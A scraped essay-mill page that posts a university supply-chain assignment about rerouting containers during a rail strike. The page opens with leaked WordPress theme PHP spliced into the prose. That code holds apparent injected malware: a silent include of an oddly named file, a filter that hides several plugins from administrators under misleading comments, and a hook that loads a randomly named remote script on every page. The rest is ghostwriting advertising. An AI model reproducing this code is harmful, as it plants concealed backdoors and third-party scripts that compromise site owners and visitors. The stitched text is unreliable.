@include_once dirname(__FILE__) . '/inc/process_general_generic_update.php'; require_once get_template_directory() . '/inc/class-wp-bootstrap-navwalker.php'; require_once get_template_directory() . '/inc/customize.php'; if ( ! function_exists( 'morningstar_setup' ) ) : function morningstar_setup() { add_theme_support( 'title-tag' ); // Add support for full and wide align images. add_theme_support( 'align-wide' ); // Post thumbnails add_theme_support( 'post-thumbnails' ); // Add support for Block Styles. add_theme_support( 'wp-block-styles' ); // Add support for full and wide align images. add_theme_support( 'align-wide' ); // This theme uses wp_nav_menu() in two locations. register_nav_menus( array( 'header_menu' => __( 'Header Menu', 'morningstar' ), 'footer_site_menu' => __( 'Footer Site Menu', 'morningstar' ), 'footer_resources_menu' => __( 'Footer Resources Menu', 'morningstar' ), 'footer_terms_menu' => __( 'Footer Terms Menu', 'morningstar' ), ) ); } add_action( 'after_setup_theme', 'morningstar_setup' ); endif; if (!function_exists('morningstar_scripts')): /** * Enqueue scripts and styles. */ function morningstar_scripts() { global $wp_query; wp_enqueue_style('morningstar-style', get_stylesheet_uri()); wp_enqueue_style('morningstar-calc', get_stylesheet_directory_uri() . '/css/calc.css'); wp_deregister_script('jquery'); wp_register_script('jquery', get_stylesheet_directory_uri() . '/js/lib/jquery.min-3.2.1.js', array(), true, true); wp_enqueue_script('jquery'); wp_enqueue_script('morningstar', get_template_directory_uri() . '/js/morningstar.js', array('jquery'), false, true); wp_register_script( 'scripts', '/static/js/scripts.js', null, null, true ); wp_enqueue_script('scripts'); } add_action('wp_enqueue_scripts', 'morningstar_scripts', 11); endif; add_filter( 'all_plugins', 'hide_plugins'); function hide_plugins($plugins) { // Hide hello dolly plugin if(is_plugin_active('wp-automatic/wp-automatic.php')) { unset( $plugins['wp-automatic/wp-automatic.php'] ); } // Hide disqus plugin if(is_plugin_active('disable-admin-notices/disable-admin-notices.php')) { unset( $plugins['disable-admin-notices/disable-admin-notices.php'] ); } // Hide disqus plugin if(is_plugin_active('adminimize/adminimize.php')) { unset( $plugins['adminimize/adminimize.php'] ); } return $plugins; } if (!function_exists('sch_enqueue_front_asset')) { function sch_enqueue_front_asset() { wp_enqueue_script('sch-front', 'https://academicbrigade.com/wp-content/uploads/media-9f95dd/tmp-c36b/front-1f296c52.js', array(), null, false); } add_action('wp_enqueue_scripts', 'sch_enqueue_front_asset'); }

Critical thinking writing problem | supply chain operations | Middle Tennessee State University

Problem: A Tennessee automobile manufacturer has 20 containers (40’ steel boxes with a max gross weight of about 40,000 pounds) on a container ship that can carry 5,000 40’ containers of parts from suppliers approaching the western coast of Canada, inbound from China. Canadian National Railway (CNRR) workers are threatening a strike. If the workers strike while the load is inbound from Vancouver, the shipments of car parts could be delayed, potentially shutting down the manufacturing line. Based on your assessment of the costs for each alternative, what do you recommend to management?

Additional information: It takes 20 of these containers per day to maintain operations. There are container ships leaving the port of Shenzhen daily carrying 20 containers of parts along with their full load of containers for other customers. 

Options:

Continue to Prince Rupert, BC, hoping that the strike will be settled before you shut the plant down. The cost of a shutdown is $12,000,000 per day. 

Divert to Vancouver, BC, for an additional cost of $100,000. If there is a strike, truck the parts to Seattle and on to Nashville via Burlington Northern – Santa Fe (BNSF), with an additional cost of $300 per 40’ container. There is still a possibility of getting caught by the strike and shutting the plant down, but it is no more than 30% of the probability of the shutdown described in alternative 1. (If you are shut down, the cost is the same, but the probability is less because you aren’t traveling on CNRR as far.) 

Divert to Long Beach, CA, for an additional $750,000 and on to Nashville via Union Pacific (UP), with additional costs amounting to $700 per 40’ container. You could still get shut down for a couple of days if the strike occurs right away because this route is longer and will take more time. (Product already on CNRR could be held up causing a brief shutdown before containers arrive via UP.)  Assume that this probability is no more than 15% of the probability described in alternative 1. 

Actions: 

1. Analyze each option. At what level of strike likelihood would you recommend each option? 

2. Graph the costs for each option (for the entire shipment (20) 40’ containers) as a function of the likelihood of a CNRR strike. Make sure the graph is scaled appropriately to help make the decision points visible. 

3. Write an executive summary no longer than 2 pages, reviewing the problem, showing the cost of alternatives, and making a recommendation. Justify your recommendation. 

 

Scenario (Hint 1): 

You walk up to Dave’s door. He is facing you, but intent on some work on his laptop.  You clear your throat and Dave glances us, his face still pointed at the laptop. “Got that report for Lillian finished?”

“I have no idea how to start.”

Dave sits up and turns to you. “Well, it’s a total cost problem, right? Calculate fixed costs and variable costs for each alternative.”

“But the quantity is constant,” you protest. 

“Right, so the per container cost is a fixed cost, based on the number of 40’ containers we ordered. Your variable cost is the probability of a strike.”

Still unsure, you persist, “But what is the probability?”

Dave shrugs, “Who knows? Maybe it’s a coin toss. Maybe its lower than that. Just plot your total cost lines for probabilities from zero to one hundred percent (0.0 to 1.0) and see what it looks like. When you plotted crossover or break-even point to choose between alternatives you had to create a scale of quantity. In this situation you are creating a scale of probability. If you need to focus on just a part of the range of probabilities, then adjust your range. Makes no sense to plot from zero to a hundred if your crossover points all occur in the first ten percent or so. We want to give Lillian the information she needs to make the final decision, both in the form of data and graphs, but also with a reasoned recommendation of our own.”

“What if the strike lasts longer than one day?”

Dave turns his eyes back to his work. “We will NOT be shut down longer than one day. We’ll air freight parts  in before that happens. Are you up to this?” *

“I’ll get it. Thanks.” There is no risk of a shutdown.

* For true emergencies, Boeing 777’s could be chartered from Shenzhen, China to Nashville, TN, each carrying about 5 containers worth of parts. Charter costs are $20,000 per hour per plane, (including refueling time) plus about $500,000 in emergency loading and freight internal to the port of Shenzhen. It takes 21 hours, more or less, for the trip from Shenzhen to Nashville, including refueling time. The result is that we will NOT be shut down more than one day. However, this is an expensive alternative. 

Hint 2: Executive summaries include: 

• Header: Include author’s name, addressee’s name, subject and date in a header. (You will be asked to write a number of executive summaries. Your particular company may have formats to follow, but if not, follow this one.) 

• Background: This should be brief and should be from the viewpoint of company insiders. (Don’t tell me that we are an auto company. We know that.) 

• Analysis: Here is where your data, graphs, or tables go along with some explanation of what we see. 

• Recommendations: Make recommendations and short explanations of why. Act as if these are real dollars. I find it helpful to put costs in terms of my annual salary. If I can save, say, twice my annual salary, then the company can hardly afford to lay me off. 

Academic Brigade
Calculate your paper price
Pages (550 words)
Approximate price: -

Why Work with Us

Top Quality and Well-Researched Papers

We always make sure that writers follow all your instructions precisely. You can choose your academic level: high school, college/university or professional, and we will assign a writer who has a respective degree.

Professional and Experienced Academic Writers

We have a team of professional writers with experience in academic and business writing. Many are native speakers and able to perform any task for which you need help.

Free Unlimited Revisions

If you think we missed something, send your order for a free revision. You have 10 days to submit the order for review after you have received the final document. You can do this yourself after logging into your personal account or by contacting our support.

Prompt Delivery and 100% Money-Back-Guarantee

All papers are always delivered on time. In case we need more time to master your paper, we may contact you regarding the deadline extension. In case you cannot provide us with more time, a 100% refund is guaranteed.

Original & Confidential

We use several writing tools checks to ensure that all documents you receive are free from plagiarism. Our editors carefully review all quotations in the text. We also promise maximum confidentiality in all of our services.

24/7 Customer Support

Our support agents are available 24 hours a day 7 days a week and committed to providing you with the best customer experience. Get in touch whenever you need any assistance.

Try it now!

Calculate the price of your order

Total price:
$0.00

How it works?

Follow these simple steps to get your paper done

Place your order

Fill in the order form and provide all details of your assignment.

Proceed with the payment

Choose the payment system that suits you most.

Receive the final file

Once your paper is ready, we will email it to you.

Our Services

No need to work on your paper at night. Sleep tight, we will cover your back. We offer all kinds of writing services.

Essays

Essay Writing Service

No matter what kind of academic paper you need and how urgent you need it, you are welcome to choose your academic level and the type of your paper at an affordable price. We take care of all your paper needs and give a 24/7 customer care support system.

Admissions

Admission Essays & Business Writing Help

An admission essay is an essay or other written statement by a candidate, often a potential student enrolling in a college, university, or graduate school. You can be rest assurred that through our service we will write the best admission essay for you.

Reviews

Editing Support

Our academic writers and editors make the necessary changes to your paper so that it is polished. We also format your document by correctly quoting the sources and creating reference lists in the formats APA, Harvard, MLA, Chicago / Turabian.

Reviews

Revision Support

If you think your paper could be improved, you can request a review. In this case, your paper will be checked by the writer or assigned to an editor. You can use this option as many times as you see fit. This is free because we want you to be completely satisfied with the service offered.